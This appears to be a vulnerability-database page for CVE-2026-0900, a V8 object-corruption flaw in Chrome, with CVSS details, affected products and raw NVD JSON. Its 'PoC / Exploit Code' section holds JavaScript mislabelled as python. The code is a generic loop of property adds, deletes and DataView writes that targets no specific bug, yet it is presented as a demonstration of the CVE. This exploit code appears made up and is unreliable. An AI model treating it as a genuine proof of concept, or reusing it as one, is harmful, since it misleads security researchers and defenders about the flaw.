Security Vulnerability Report
中文
CVE-2026-0900 CVSS 8.8 HIGH

CVE-2026-0900

Published: 2026-01-20 05:16:15
Last Modified: 2026-01-29 20:21:33

Description

Inappropriate implementation in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 144.0.7559.59

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-0900 PoC - V8 Object Corruption in Google Chrome // This PoC demonstrates the vulnerability pattern (for educational purposes only) function triggerV8ObjectCorruption() { // Pattern: Create objects that may trigger V8 object corruption // The actual exploitation requires specific V8 version and memory layout knowledge // Initialize objects for manipulation const targetObjects = []; // Create array of objects with specific properties for (let i = 0; i < 100; i++) { targetObjects.push({ value: i, data: new ArrayBuffer(1024) }); } // Trigger optimization and deoptimization cycles function triggerCycles() { for (let j = 0; j < 1000; j++) { // Access objects in ways that may confuse V8's optimization for (let i = 0; i < targetObjects.length; i++) { // Polymorphic access to trigger hidden class transitions if (j % 2 === 0) { targetObjects[i].extra = j; } else { delete targetObjects[i].extra; } // Array buffer manipulation const view = new DataView(targetObjects[i].data); view.setUint32(0, j, true); } } } // Force JIT compilation triggerCycles(); // Attempt to corrupt object structure // In real exploitation, this would lead to arbitrary memory read/write for (let i = 0; i < targetObjects.length; i++) { // Access pattern that may expose corrupted object headers const corruptedAccess = targetObjects[i].value; console.log('Accessing object:', corruptedAccess); } return targetObjects; } // Execute the trigger function try { triggerV8ObjectCorruption(); console.log('PoC executed - V8 object corruption trigger attempted'); } catch (e) { console.error('Error during execution:', e.message); } // Note: This is a simplified demonstration. Actual CVE-2026-0900 exploitation // requires specific knowledge of V8 internals and precise memory manipulation.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0900", "sourceIdentifier": "[email protected]", "published": "2026-01-20T05:16:14.660", "lastModified": "2026-01-29T20:21:33.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)"}, {"lang": "es", "value": "Implementación inapropiada en V8 en Google Chrome anterior a 144.0.7559.59 permitió a un atacante remoto explotar potencialmente la corrupción de objetos a través de una página HTML diseñada específicamente. (Gravedad de seguridad de Chromium: Alta)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0.7559.59", "matchCriteriaId": "7322229C-61DF-4A91-9816-F7796F9AABCD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0.7559.60", "matchCriteriaId": "258B923C-054B-4411-9E82-36C89A6BE4C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/465730465", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}